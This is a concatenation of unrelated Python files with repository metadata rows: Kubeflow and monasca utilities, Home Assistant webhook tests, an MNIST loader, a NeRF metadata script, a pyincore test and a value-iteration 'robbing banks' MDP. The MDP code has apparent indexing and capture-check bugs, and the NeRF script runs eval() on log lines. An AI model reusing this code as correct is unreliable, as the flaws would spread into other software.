logging.exception('Exception when calling CoreV1Api->delete_namespaced_pod: {}\n'.format(str(e)))
def _read_pod_log(self, pod_name, yaml_spec):
try:
api_response = self._corev1.read_namespaced_pod_log(pod_name, yaml_spec['metadata']['namespace'])
except k8s_client.rest.ApiException as e:
logging.exception('Exception when calling CoreV1Api->read_namespaced_pod_log: {}\n'.format(str(e)))
return False
return api_response
def run_job(self, yaml_spec, timeout=600):
""" run_job runs a kubernetes job and clean up afterwards """
pod_name, succ = self._create_k8s_job(yaml_spec)
if not succ:
return False
# timeout in seconds
succ = self._wait_for_k8s_job(pod_name, yaml_spec, timeout)
if not succ:
logging.info('Kubernetes job failed.')
return False
#TODO: investigate the read log error
# print(self._read_pod_log(pod_name, yaml_spec))
self._delete_k8s_job(pod_name, yaml_spec)
return succ
@staticmethod
def sanitize_k8s_name(name):
"""From _make_kubernetes_name
sanitize_k8s_name cleans and converts the names in the workflow.
"""
return re.sub('-+', '-', re.sub('[^-0-9a-z]+', '-', name.lower())).lstrip('-').rstrip('-')
@staticmethod
def convert_k8s_obj_to_json(k8s_obj):
"""
Builds a JSON K8s object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is swagger model, return the properties dict.
Args:
obj: The data to serialize.
Returns: The serialized form of data.
"""
from six import text_type, integer_types, iteritems
PRIMITIVE_TYPES = (float, bool, bytes, text_type) + integer_types
from datetime import date, datetime
if k8s_obj is None:
return None
elif isinstance(k8s_obj, PRIMITIVE_TYPES):
return k8s_obj
elif isinstance(k8s_obj, list):
return [K8sHelper.convert_k8s_obj_to_json(sub_obj)
for sub_obj in k8s_obj]
elif isinstance(k8s_obj, tuple):
return tuple(K8sHelper.convert_k8s_obj_to_json(sub_obj)
for sub_obj in k8s_obj)
elif isinstance(k8s_obj, (datetime, date)):
return k8s_obj.isoformat()
elif isinstance(k8s_obj, dsl.PipelineParam):
if isinstance(k8s_obj.value, str):
return k8s_obj.value
return '{{inputs.parameters.%s}}' % k8s_obj.full_name
if isinstance(k8s_obj, dict):
obj_dict = k8s_obj
else:
# Convert model obj to dict except
# attributes `swagger_types`, `attribute_map`
# and attributes which value is not None.
# Convert attribute name to json key in
# model definition for request.
obj_dict = {k8s_obj.attribute_map[attr]: getattr(k8s_obj, attr)
for attr, _ in iteritems(k8s_obj.swagger_types)
if getattr(k8s_obj, attr) is not None}
return {key: K8sHelper.convert_k8s_obj_to_json(val)
for key, val in iteritems(obj_dict)} | 43.661202 | 136 | 0.637672 | [
"Apache-2.0"
] | JohnPaton/pipelines | sdk/python/kfp/compiler/_k8s_helper.py | 7,990 | Python |
"""Webhook tests for mobile_app."""
import logging
import pytest
from homeassistant.components.camera import SUPPORT_STREAM as CAMERA_SUPPORT_STREAM
from homeassistant.components.mobile_app.const import CONF_SECRET
from homeassistant.components.zone import DOMAIN as ZONE_DOMAIN
from homeassistant.const import CONF_WEBHOOK_ID
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.setup import async_setup_component
from .const import CALL_SERVICE, FIRE_EVENT, REGISTER_CLEARTEXT, RENDER_TEMPLATE, UPDATE
from tests.async_mock import patch
from tests.common import async_mock_service
_LOGGER = logging.getLogger(__name__)
def encrypt_payload(secret_key, payload):
"""Return a encrypted payload given a key and dictionary of data."""
try:
from nacl.secret import SecretBox
from nacl.encoding import Base64Encoder
except (ImportError, OSError):
pytest.skip("libnacl/libsodium is not installed")
return
import json
keylen = SecretBox.KEY_SIZE
prepped_key = secret_key.encode("utf-8")
prepped_key = prepped_key[:keylen]
prepped_key = prepped_key.ljust(keylen, b"\0")
payload = json.dumps(payload).encode("utf-8")
return (
SecretBox(prepped_key).encrypt(payload, encoder=Base64Encoder).decode("utf-8")
)
def decrypt_payload(secret_key, encrypted_data):
"""Return a decrypted payload given a key and a string of encrypted data."""
try:
from nacl.secret import SecretBox
from nacl.encoding import Base64Encoder
except (ImportError, OSError):
pytest.skip("libnacl/libsodium is not installed")
return
import json
keylen = SecretBox.KEY_SIZE
prepped_key = secret_key.encode("utf-8")
prepped_key = prepped_key[:keylen]
prepped_key = prepped_key.ljust(keylen, b"\0")
decrypted_data = SecretBox(prepped_key).decrypt(
encrypted_data, encoder=Base64Encoder
)
decrypted_data = decrypted_data.decode("utf-8")
return json.loads(decrypted_data)
async def test_webhook_handle_render_template(create_registrations, webhook_client):
"""Test that we render templates properly."""
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]),
json=RENDER_TEMPLATE,
)
assert resp.status == 200
json = await resp.json()
assert json == {"one": "Hello world"}
async def test_webhook_handle_call_services(hass, create_registrations, webhook_client):
"""Test that we call services properly."""
calls = async_mock_service(hass, "test", "mobile_app")
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]),
json=CALL_SERVICE,
)
assert resp.status == 200
assert len(calls) == 1
async def test_webhook_handle_fire_event(hass, create_registrations, webhook_client):
"""Test that we can fire events."""
events = []
@callback
def store_event(event):
"""Helepr to store events."""
events.append(event)
hass.bus.async_listen("test_event", store_event)
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]), json=FIRE_EVENT
)
assert resp.status == 200
json = await resp.json()
assert json == {}
assert len(events) == 1
assert events[0].data["hello"] == "yo world"
async def test_webhook_update_registration(webhook_client, authed_api_client):
"""Test that a we can update an existing registration via webhook."""
register_resp = await authed_api_client.post(
"/api/mobile_app/registrations", json=REGISTER_CLEARTEXT
)
assert register_resp.status == 201
register_json = await register_resp.json()
webhook_id = register_json[CONF_WEBHOOK_ID]
update_container = {"type": "update_registration", "data": UPDATE}
update_resp = await webhook_client.post(
f"/api/webhook/{webhook_id}", json=update_container
)
assert update_resp.status == 200
update_json = await update_resp.json()
assert update_json["app_version"] == "2.0.0"
assert CONF_WEBHOOK_ID not in update_json
assert CONF_SECRET not in update_json
async def test_webhook_handle_get_zones(hass, create_registrations, webhook_client):
"""Test that we can get zones properly."""
await async_setup_component(
hass, ZONE_DOMAIN, {ZONE_DOMAIN: {}},
)
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]),
json={"type": "get_zones"},
)
assert resp.status == 200
json = await resp.json()
assert len(json) == 1
zones = sorted(json, key=lambda entry: entry["entity_id"])
assert zones[0]["entity_id"] == "zone.home"
async def test_webhook_handle_get_config(hass, create_registrations, webhook_client):
"""Test that we can get config properly."""
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]),
json={"type": "get_config"},
)
assert resp.status == 200
json = await resp.json()
if "components" in json:
json["components"] = set(json["components"])
if "whitelist_external_dirs" in json:
json["whitelist_external_dirs"] = set(json["whitelist_external_dirs"])
hass_config = hass.config.as_dict()
expected_dict = {
"latitude": hass_config["latitude"],
"longitude": hass_config["longitude"],
"elevation": hass_config["elevation"],
"unit_system": hass_config["unit_system"],
"location_name": hass_config["location_name"],
"time_zone": hass_config["time_zone"],
"components": hass_config["components"],
"version": hass_config["version"],
"theme_color": "#03A9F4", # Default frontend theme color
}
assert expected_dict == json
async def test_webhook_returns_error_incorrect_json(
webhook_client, create_registrations, caplog
):
"""Test that an error is returned when JSON is invalid."""
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]), data="not json"
)
assert resp.status == 400
json = await resp.json()
assert json == {}
assert "invalid JSON" in caplog.text
async def test_webhook_handle_decryption(webhook_client, create_registrations):
"""Test that we can encrypt/decrypt properly."""
key = create_registrations[0]["secret"]
data = encrypt_payload(key, RENDER_TEMPLATE["data"])
container = {"type": "render_template", "encrypted": True, "encrypted_data": data}
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[0]["webhook_id"]), json=container
)
assert resp.status == 200
webhook_json = await resp.json()
assert "encrypted_data" in webhook_json
decrypted_data = decrypt_payload(key, webhook_json["encrypted_data"])
assert decrypted_data == {"one": "Hello world"}
async def test_webhook_requires_encryption(webhook_client, create_registrations):
"""Test that encrypted registrations only accept encrypted data."""
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[0]["webhook_id"]),
json=RENDER_TEMPLATE,
)
assert resp.status == 400
webhook_json = await resp.json()
assert "error" in webhook_json
assert webhook_json["success"] is False
assert webhook_json["error"]["code"] == "encryption_required"
async def test_webhook_update_location(hass, webhook_client, create_registrations):
"""Test that location can be updated."""
resp = await webhook_client.post(
"/api/webhook/{}".format(create_registrations[1]["webhook_id"]),
json={
"type": "update_location",
"data": {"gps": [1, 2], "gps_accuracy": 10, "altitude": -10},
},
)
assert resp.status == 200
state = hass.states.get("device_tracker.test_1_2")
assert state is not None
assert state.attributes["latitude"] == 1.0
assert state.attributes["longitude"] == 2.0
assert state.attributes["gps_accuracy"] == 10
assert state.attributes["altitude"] == -10
async def test_webhook_enable_encryption(hass, webhook_client, create_registrations):
"""Test that encryption can be added to a reg initially created without."""
webhook_id = create_registrations[1]["webhook_id"]
enable_enc_resp = await webhook_client.post(
f"/api/webhook/{webhook_id}", json={"type": "enable_encryption"},
)
assert enable_enc_resp.status == 200
enable_enc_json = await enable_enc_resp.json()
assert len(enable_enc_json) == 1
assert CONF_SECRET in enable_enc_json
key = enable_enc_json["secret"]
enc_required_resp = await webhook_client.post(
f"/api/webhook/{webhook_id}", json=RENDER_TEMPLATE,
)
assert enc_required_resp.status == 400
enc_required_json = await enc_required_resp.json()
assert "error" in enc_required_json
assert enc_required_json["success"] is False
assert enc_required_json["error"]["code"] == "encryption_required"
enc_data = encrypt_payload(key, RENDER_TEMPLATE["data"])
container = {
"type": "render_template",
"encrypted": True,
"encrypted_data": enc_data,
}
enc_resp = await webhook_client.post(f"/api/webhook/{webhook_id}", json=container)
assert enc_resp.status == 200
enc_json = await enc_resp.json()
assert "encrypted_data" in enc_json
decrypted_data = decrypt_payload(key, enc_json["encrypted_data"])
assert decrypted_data == {"one": "Hello world"}
async def test_webhook_camera_stream_non_existent(
hass, create_registrations, webhook_client
):
"""Test fetching camera stream URLs for a non-existent camera."""
webhook_id = create_registrations[1]["webhook_id"]
resp = await webhook_client.post(
f"/api/webhook/{webhook_id}",
json={
"type": "stream_camera",
"data": {"camera_entity_id": "camera.doesnt_exist"},
},
)
assert resp.status == 400
webhook_json = await resp.json()
assert webhook_json["success"] is False
async def test_webhook_camera_stream_non_hls(
hass, create_registrations, webhook_client
):
"""Test fetching camera stream URLs for a non-HLS/stream-supporting camera."""
hass.states.async_set("camera.non_stream_camera", "idle", {"supported_features": 0})
webhook_id = create_registrations[1]["webhook_id"]
resp = await webhook_client.post(
f"/api/webhook/{webhook_id}",
json={
"type": "stream_camera",
"data": {"camera_entity_id": "camera.non_stream_camera"},
},
)
assert resp.status == 200
webhook_json = await resp.json()
assert webhook_json["hls_path"] is None
assert (
webhook_json["mjpeg_path"]
== "/api/camera_proxy_stream/camera.non_stream_camera"
)
async def test_webhook_camera_stream_stream_available(
hass, create_registrations, webhook_client
):
"""Test fetching camera stream URLs for an HLS/stream-supporting camera."""
hass.states.async_set(
"camera.stream_camera", "idle", {"supported_features": CAMERA_SUPPORT_STREAM}
)
webhook_id = create_registrations[1]["webhook_id"]
with patch(
"homeassistant.components.camera.async_request_stream",
return_value="/api/streams/some_hls_stream",
):
resp = await webhook_client.post(
f"/api/webhook/{webhook_id}",
json={
"type": "stream_camera",
"data": {"camera_entity_id": "camera.stream_camera"},
},
)
assert resp.status == 200
webhook_json = await resp.json()
assert webhook_json["hls_path"] == "/api/streams/some_hls_stream"
assert webhook_json["mjpeg_path"] == "/api/camera_proxy_stream/camera.stream_camera"
async def test_webhook_camera_stream_stream_available_but_errors(
hass, create_registrations, webhook_client
):
"""Test fetching camera stream URLs for an HLS/stream-supporting camera but that streaming errors."""
hass.states.async_set(
"camera.stream_camera", "idle", {"supported_features": CAMERA_SUPPORT_STREAM}
)
webhook_id = create_registrations[1]["webhook_id"]
with patch(
"homeassistant.components.camera.async_request_stream",
side_effect=HomeAssistantError(),
):
resp = await webhook_client.post(
f"/api/webhook/{webhook_id}",
json={
"type": "stream_camera",
"data": {"camera_entity_id": "camera.stream_camera"},
},
)
assert resp.status == 200
webhook_json = await resp.json()
assert webhook_json["hls_path"] is None
assert webhook_json["mjpeg_path"] == "/api/camera_proxy_stream/camera.stream_camera"
| 31.799511 | 105 | 0.685068 | [
"Apache-2.0"
] | Bonnee/core | tests/components/mobile_app/test_webhook.py | 13,006 | Python |
# (C) Copyright 2016 Hewlett Packard Enterprise Development LP
# Copyright 2016 FUJITSU LIMITED
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import monascastatsd
from oslo_config import cfg
from oslo_log import log
from monasca_notification.common.repositories import exceptions
from monasca_notification.notification import Notification
LOG = log.getLogger(__name__)
CONF = cfg.CONF
NOTIFICATION_DIMENSIONS = {'service': 'monitoring',
'component': 'monasca-notification'}
def get_db_repo():
repo_driver = CONF.database.repo_driver
LOG.debug('Enabling the %s RDB repository', repo_driver)
return repo_driver(CONF)
def construct_notification_object(db_repo, notification_json):
try:
notification = Notification(notification_json['id'],
notification_json['type'],
notification_json['name'],
notification_json['address'],
notification_json['period'],
notification_json['retry_count'],
notification_json['raw_alarm'])
# Grab notification method from database to see if it was changed
stored_notification = grab_stored_notification_method(db_repo, notification.id)
# Notification method was deleted
if stored_notification is None:
LOG.debug("Notification method {0} was deleted from database. "
"Will stop sending.".format(notification.id))
return None
# Update notification method with most up to date values
else:
notification.name = stored_notification[0]
notification.type = stored_notification[1]
notification.address = stored_notification[2]
notification.period = stored_notification[3]
return notification
except exceptions.DatabaseException:
LOG.warn("Error querying mysql for notification method. "
"Using currently cached method.")
return notification
except Exception as e:
LOG.warn("Error when attempting to construct notification {0}".format(e))
return None
def grab_stored_notification_method(db_repo, notification_id):
try:
stored_notification = db_repo.get_notification(notification_id)
except exceptions.DatabaseException:
LOG.debug('Database Error. Attempting reconnect')
stored_notification = db_repo.get_notification(notification_id)
return stored_notification
def get_statsd_client(dimensions=None):
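    # Merge caller-supplied dimensions with the standard notification dimensions and
    # return either a real statsd client or an offline stub, depending on configuration.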
local_dims = dimensions.copy() if dimensions else {}
local_dims.update(NOTIFICATION_DIMENSIONS)
if CONF.statsd.enable:
LOG.debug("Stablishing connection with statsd on {0}:{1}"
.format(CONF.statsd.host, CONF.statsd.port))
client = monascastatsd.Client(name='monasca',
host=CONF.statsd.host,
port=CONF.statsd.port,
dimensions=local_dims)
else:
LOG.debug("Overriding monascastatsd.Client to use it offline")
client = OfflineClient(name='monasca',
host=CONF.statsd.host,
port=CONF.statsd.port,
dimensions=local_dims)
return client
class OfflineClient(monascastatsd.Client):
def _set_connection(self, connection, host, port):
if connection is None:
self.connection = OfflineConnection(host=host,
port=port,
max_buffer_size=self._max_buffer_size)
else:
self.connection = connection
class OfflineConnection(monascastatsd.Connection):
def __init__(self, host='localhost', port=8125, max_buffer_size=50):
"""Initialize an Offline Connection object.
>>> monascastatsd = MonascaStatsd()
:name: the name for this client. Everything sent by this client
will be prefixed by name
:param host: the host of the MonascaStatsd server.
:param port: the port of the MonascaStatsd server.
:param max_buffer_size: Maximum number of metric to buffer before
sending to the server if sending metrics in batch
"""
self.max_buffer_size = max_buffer_size
self._send = self._send_to_server
self.connect(host, port)
self.encoding = 'utf-8'
def connect(self, host, port):
"""Avoid to connect to the monascastatsd server.
"""
pass
def _send_to_server(self, packet):
pass
| 38.830882 | 87 | 0.635296 | [
"Apache-2.0"
] | martinchacon/monasca-notification | monasca_notification/common/utils.py | 5,281 | Python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "Christian Heider Nielsen"
__doc__ = r"""
"""
import h5py
import torch
import torch.utils
import torch.utils.data
from .h5_mnist_data import download_binary_mnist
def load_binary_mnist(cfg, **kwcfg):
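    """Load the binarised MNIST train/valid/test splits from HDF5 and wrap them in DataLoaders."""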
fname = cfg.data_dir / "binary_mnist.h5"
if not fname.exists():
print("Downloading binary MNIST data...")
download_binary_mnist(fname)
    with h5py.File(str(fname), "r") as f:
        x_train = f["train"][::]
        x_val = f["valid"][::]
        x_test = f["test"][::]
train = torch.utils.data.TensorDataset(torch.from_numpy(x_train))
train_loader = torch.utils.data.DataLoader(
train, batch_size=cfg.batch_size, shuffle=True, **kwcfg
)
validation = torch.utils.data.TensorDataset(torch.from_numpy(x_val))
val_loader = torch.utils.data.DataLoader(
validation, batch_size=cfg.test_batch_size, shuffle=False
)
test = torch.utils.data.TensorDataset(torch.from_numpy(x_test))
test_loader = torch.utils.data.DataLoader(
test, batch_size=cfg.test_batch_size, shuffle=False
)
return train_loader, val_loader, test_loader
| 29.820513 | 72 | 0.684437 | [
"Apache-2.0"
] | cnheider/vision | samples/regression/vae/flow/data_loader.py | 1,163 | Python |
import json
import os
# set working directory
def gen_json(t):
print(os.getcwd())
# read log file
with open('Screenshots/Screenshoot_meta.txt', 'r') as f:
log = f.read()
data = {"camera_angle_x": 0.6911112070083618}
frames = []
line_cnt = 0
for line in log.split('\n'):
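        # Each log line is expected to hold a 4x4 camera transform matrix literal (eval'd below).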
        try:
            record = {"file_path": "{}_{:04d}".format(t, line_cnt),
                      "rotation": 4.0,
                      "transform_matrix": eval(line)}
            frames.append(record)
        except Exception:
            # Skip lines that do not parse instead of re-appending a stale record
            pass
        line_cnt += 1
data["frames"] = frames
data_json = json.dumps(data)
with open('Screenshots/Screenshoot_meta.json', 'w') as ff:
ff.write(data_json)
# %%
# %%
| 27.655172 | 118 | 0.495012 | [
"MIT"
] | songrise/nerf | my_src/meta_json.py | 802 | Python |
# This program and the accompanying materials are made available under the
# terms of the Mozilla Public License v2.0 which accompanies this distribution,
# and is available at https://www.mozilla.org/en-US/MPL/2.0/
from pyincore.utils.cgeoutputprocess import CGEOutputProcess
import os
PYINCOREPATH = "path-to-pyincore"
TESTAPATH = "pyincore/tests/pyincore/analyses/"
def run_convert_cge_json():
# run the JoplinCGE analysis first to get results, csv files
cge_json = CGEOutputProcess()
filepath = os.path.join(PYINCOREPATH, TESTAPATH, "joplincge")
cge_json.get_cge_household_count(None,
os.path.join(filepath, "joplin-pop-disl-results.csv"),
"cge_total_household_count.json")
cge_json.get_cge_gross_income(None,
os.path.join(filepath, "gross-income.csv"),
"cge_total_household_income.json")
cge_json.get_cge_employment(None, None,
os.path.join(filepath, "pre-disaster-factor-demand.csv"),
os.path.join(filepath, "post-disaster-factor-demand.csv"),
"cge_employment.json")
cge_json.get_cge_domestic_supply(None,
os.path.join(filepath, "domestic-supply.csv"),
"cge_domestic_supply.json")
return True
if __name__ == '__main__':
run_convert_cge_json()
| 44.205882 | 91 | 0.612774 | [
"MPL-2.0",
"MPL-2.0-no-copyleft-exception"
] | IN-CORE/pyincore | tests/pyincore/utils/test_csvoutputjson.py | 1,503 | Python |
import numpy as np
import matplotlib.pyplot as plt
import time
from IPython import display
# Implemented methods
methods = ['DynProg', 'ValIter'];
# Some colours
LIGHT_RED = '#FFC4CC';
LIGHT_GREEN = '#95FD99';
BLACK = '#000000';
WHITE = '#FFFFFF';
LIGHT_PURPLE = '#E8D0FF';
LIGHT_ORANGE = '#FAE0C3';
SEB_GREEN = '#52B92C';
BUSTED_BLUE = '#5993B5'
class RobbingBanks:
# Actions
STAY = 0
MOVE_LEFT = 1
MOVE_RIGHT = 2
MOVE_UP = 3
MOVE_DOWN = 4
# Give names to actions
actions_names = {
STAY: "stay",
MOVE_LEFT: "move left",
MOVE_RIGHT: "move right",
MOVE_UP: "move up",
MOVE_DOWN: "move down"
}
# Reward values
def __init__(self, town_map):
""" Constructor of the environment town_map.
"""
self.STEP_REWARD = 0
self.BANK_REWARD = 10
self.CAUGHT_REWARD = -50
self.town_map = town_map;
self.initial_state = np.array([0,0,1,2])
self.actions = self.__actions();
self.states, self.map = self.__states();
self.n_actions = len(self.actions);
self.n_states = len(self.states);
self.transition_probabilities = self.__transitions();
self.rewards = self.__rewards();
def __actions(self):
actions = dict();
actions[self.STAY] = np.array([0, 0]);
actions[self.MOVE_LEFT] = np.array([0,-1]);
actions[self.MOVE_RIGHT] = np.array([0, 1]);
actions[self.MOVE_UP] = np.array([-1,0]);
actions[self.MOVE_DOWN] = np.array([1,0]);
return actions;
def __states(self):
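        # Enumerate every (robber row, robber col, police row, police col) combination,
        # mapping index -> state array and coordinate tuple -> index.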
states = dict();
states_vec = dict();
s = 0;
for i in range(self.town_map.shape[0]):
for j in range(self.town_map.shape[1]):
for k in range(self.town_map.shape[0]):
for l in range(self.town_map.shape[1]):
states[s] = np.array([i,j,k,l]);
states_vec[(i,j,k,l)] = s;
s += 1;
return states, states_vec
def __move(self, state, action):
""" Makes a step in the town_map, given a current position and an action.
If the action STAY or an inadmissible action is used, the robber stays in place.
:return integer next_cell corresponding to position (x,y) x (x,y) on the town_map that agent transitions to.
"""
# Compute the future position given current (state, action)
row = self.states[state][0] + self.actions[action][0];
col = self.states[state][1] + self.actions[action][1];
# Is the future position an impossible one ?
hitting_town_walls = (row == -1) or (row == self.town_map.shape[0]) or \
(col == -1) or (col == self.town_map.shape[1])
# Based on the impossiblity check return the next state.
list_police_pos = self.__police_positions(state)
new_police_pos = list_police_pos[np.random.randint(len(list_police_pos))]
#caught = (row, col) == (new_police_pos[0], new_police_pos[1])
caught = all(self.states[state][0:2] == self.states[state][2:])
if caught:
return self.map[tuple(self.initial_state)];
#Hot take: If you "unintentionally" hit the wall, the result should be that you (and the police) stay in place since it's not a "deliberate" move
elif hitting_town_walls:
return state
else:
return self.map[(row, col, new_police_pos[0], new_police_pos[1])];
def __police_positions(self, state):
"""
Input: The state as an int
        Returns: A list of possible new police positions from the current state
"""
agent_pos = self.states[state][0:2]
police_pos = self.states[state][2:]
diff_pos = np.sign(agent_pos - police_pos)
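        # Candidate police moves: if police and robber share a row/column, step perpendicular
        # (either way) or straight towards the robber; otherwise close in along either axis.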
        list_pos = [[1, 0], [-1, 0], [0, diff_pos[1]]] if diff_pos[0] == 0 else [[0, 1], [0, -1], [diff_pos[0], 0]] if diff_pos[1] == 0 else [[0, diff_pos[1]], [diff_pos[0], 0]]
        # Shift each relative move by the current police position (element-wise, not list concatenation).
        list_pos = [np.array(pos) + police_pos for pos in list_pos]
        list_pos = list(filter(None, [tuple(pos) * (0 <= pos[0] < self.town_map.shape[0] and 0 <= pos[1] < self.town_map.shape[1]) for pos in list_pos]))
return list_pos
def __transitions(self):
""" Computes the transition probabilities for every state action pair.
:return numpy.tensor transition probabilities: tensor of transition
probabilities of dimension S*S*A
"""
# Initialize the transition probailities tensor (S,S,A)
dimensions = (self.n_states,self.n_states,self.n_actions);
transition_probabilities = np.zeros(dimensions);
# Compute the transition probabilities. Note that the transitions
# are deterministic.
for s in range(self.n_states):
#if we are in the same position as the police, we return to initial
if (self.states[s][0],self.states[s][1])==(self.states[s][2],self.states[s][3]):
transition_probabilities[self.initial_state, s, :] = 1/3
else:
for a in range(self.n_actions):
list_pos = self.__police_positions(s) #police positions
for police_pos in list_pos:
next_s = self.__move(s,a);
new_pos = np.copy(self.states[next_s])
new_pos[2:] = police_pos
next_s = self.map[tuple(new_pos)]
transition_probabilities[next_s, s, a] = 1/len(list_pos);
return transition_probabilities;
def __rewards(self):
rewards = np.zeros((self.n_states, self.n_actions));
# rewards[i,j,k] = r(s' | s, a): tensor of rewards of dimension S x S x A
for s in range(self.n_states):
list_pos = self.__police_positions(s)
for a in range(self.n_actions):
next_s = self.__move(s,a);
#if we can get caught in the next move
if (tuple(self.states[next_s][0:2]) in list_pos):
#if our next position is not a bank
if self.town_map[tuple(self.states[next_s][0:2])] != 1:
rewards[s,a] = self.CAUGHT_REWARD/len(list_pos)
#if our next position is a bank
if self.town_map[tuple(self.states[next_s][0:2])] == 1:
rewards[s,a] = self.CAUGHT_REWARD/len(list_pos) + (len(list_pos)-1)*self.BANK_REWARD/len(list_pos)
#if we cannot get caught in the next move
else:
#reward for standing in a bank
if self.town_map[tuple(self.states[next_s][0:2])] == 1:
rewards[s,a] = self.BANK_REWARD
# list_pos = self.__police_positions(s)
# for a in range(self.n_actions):
# next_s = self.__move(s,a);
return rewards;
def simulate(self,policy):
path = list();
# Initialize current state, next state and time
t = 1;
s = self.map[tuple(self.initial_state)];
# Add the starting position in the town_map to the path
path.append(self.initial_state);
# Move to next state given the policy and the current state
next_s = self.__move(s,policy[s]);
# Add the position in the town_map corresponding to the next state
        # to the path
path.append(self.states[next_s]);
# Loop while state is not the goal state
T = 40
while t<T:
# Update state
s = next_s;
# Move to next state given the policy and the current state
next_s = self.__move(s,policy[s]);
# Add the position in the town_map corresponding to the next state
# to the path
path.append(self.states[next_s])
# Update time and state for next iteration
t +=1;
return path
def show(self):
print('The states are :')
print(self.states)
print('The actions are:')
print(self.actions)
print('The mapping of the states:')
print(self.map)
print('The rewards:')
print(self.rewards)
def value_iteration(env, gamma, epsilon):
""" Solves the shortest path problem using value iteration
:input town_map env : The town_map environment in which we seek to
find the shortest path.
:input float gamma : The discount factor.
:input float epsilon : accuracy of the value iteration procedure.
:return numpy.array V : Optimal values for every state at every
time, dimension S*T
:return numpy.array policy: Optimal time-varying policy at every state,
dimension S*T
"""
# The value itearation algorithm requires the knowledge of :
# - Transition probabilities
# - Rewards
# - State space
# - Action space
# - The finite horizon
p = env.transition_probabilities;
r = env.rewards;
n_states = env.n_states;
n_actions = env.n_actions;
# Required variables and temporary ones for the VI to run
V = np.zeros(n_states);
Q = np.zeros((n_states, n_actions));
BV = np.zeros(n_states);
# Iteration counter
n = 0;
# Tolerance error
tol = (1 - gamma)* epsilon/gamma;
#tol = 100
# Initialization of the VI
for s in range(n_states):
for a in range(n_actions):
Q[s, a] = r[s, a] + gamma*np.dot(p[:,s,a],V);
BV = np.max(Q, 1);
# Iterate until convergence
while np.linalg.norm(V - BV) >= tol and n < 2600:
# Increment by one the numbers of iteration
n += 1;
# Update the value function
V = np.copy(BV);
# Compute the new BV
for s in range(n_states):
for a in range(n_actions):
Q[s, a] = r[s, a] + gamma*np.dot(p[:,s,a],V);
BV = np.max(Q, 1);
# Show error
#print(np.linalg.norm(V - BV))
# Compute policy
policy = np.argmax(Q,1);
# Return the obtained policy
return V, policy;
def draw_town_map(town_map):
# Map a color to each cell in the town_map
col_map = {0: WHITE, 1: BLACK, 2: LIGHT_GREEN, -6: LIGHT_RED, -1: LIGHT_RED};
# Give a color to each cell
rows,cols = town_map.shape;
colored_town_map = [[col_map[town_map[j,i]] for i in range(cols)] for j in range(rows)];
# Create figure of the size of the town_map
fig = plt.figure(1, figsize=(cols,rows));
# Remove the axis ticks and add title title
ax = plt.gca();
ax.set_title('The town_map');
ax.set_xticks([]);
ax.set_yticks([]);
# Give a color to each cell
rows,cols = town_map.shape;
colored_town_map = [[col_map[town_map[j,i]] for i in range(cols)] for j in range(rows)];
# Create figure of the size of the town_map
fig = plt.figure(1, figsize=(cols,rows))
# Create a table to color
grid = plt.table(cellText=None,
cellColours=colored_town_map,
cellLoc='center',
loc=(0,0),
edges='closed');
# Modify the hight and width of the cells in the table
tc = grid.properties()['children']
for cell in tc:
cell.set_height(1.0/rows);
cell.set_width(1.0/cols);
def animate_solution(town_map, path, save_anim = False, until_caught = False, gamma = 0):
# Map a color to each cell in the town_map
col_map = {0: WHITE, 1: SEB_GREEN, 2: LIGHT_GREEN, -6: LIGHT_RED, -1: LIGHT_RED};
# Size of the town_map
rows,cols = town_map.shape;
# Create figure of the size of the town_map
fig = plt.figure(1, figsize=(cols,rows));
# Remove the axis ticks and add title title
ax = plt.gca();
    ax.set_title(r'Policy simulation: $\lambda$ = %0.1f' % gamma);
ax.set_xticks([]);
ax.set_yticks([]);
# Give a color to each cell
colored_town_map = [[col_map[town_map[j,i]] for i in range(cols)] for j in range(rows)];
# Create figure of the size of the town_map
fig = plt.figure(1, figsize=(cols,rows))
# Create a table to color
grid = plt.table(cellText=None,
cellColours=colored_town_map,
cellLoc='center',
loc=(0,0),
edges='closed');
# Modify the hight and width of the cells in the table
tc = grid.properties()['children']
for cell in tc:
cell.set_height(1.0/rows);
cell.set_width(1.0/cols);
# Update the color at each frame
path_robber = [tuple(p)[0:2] for p in path]
path_police = [tuple(p)[2:] for p in path]
for i in range(len(path_robber)):
if i == 0:
grid.get_celld()[(path_robber[i])].set_facecolor(LIGHT_ORANGE)
grid.get_celld()[(path_robber[i])].get_text().set_text('Robber')
grid.get_celld()[(path_police[i])].set_facecolor(LIGHT_RED)
grid.get_celld()[(path_police[i])].get_text().set_text('Police')
if save_anim:
plt.savefig('optimal_policy_'+str(i))
else:
if until_caught and path_robber[i] == path_police[i]:
grid.get_celld()[(path_robber[i-1])].set_facecolor(col_map[town_map[path_robber[i-1]]])
grid.get_celld()[(path_robber[i-1])].get_text().set_text('')
grid.get_celld()[(path_police[i-1])].set_facecolor(col_map[town_map[path_police[i-1]]])
grid.get_celld()[(path_police[i-1])].get_text().set_text('')
grid.get_celld()[(path_police[i])].set_facecolor(BUSTED_BLUE)
grid.get_celld()[(path_police[i])].get_text().set_text('BUSTED')
print("BUSTED!!!", gamma)
if save_anim:
plt.savefig(str(gamma)+'_'+str(i)+'.png')
break
if save_anim:
plt.savefig(str(gamma)+'_'+str(i)+'.png')
grid.get_celld()[(path_robber[i-1])].set_facecolor(col_map[town_map[path_robber[i-1]]])
grid.get_celld()[(path_robber[i-1])].get_text().set_text('')
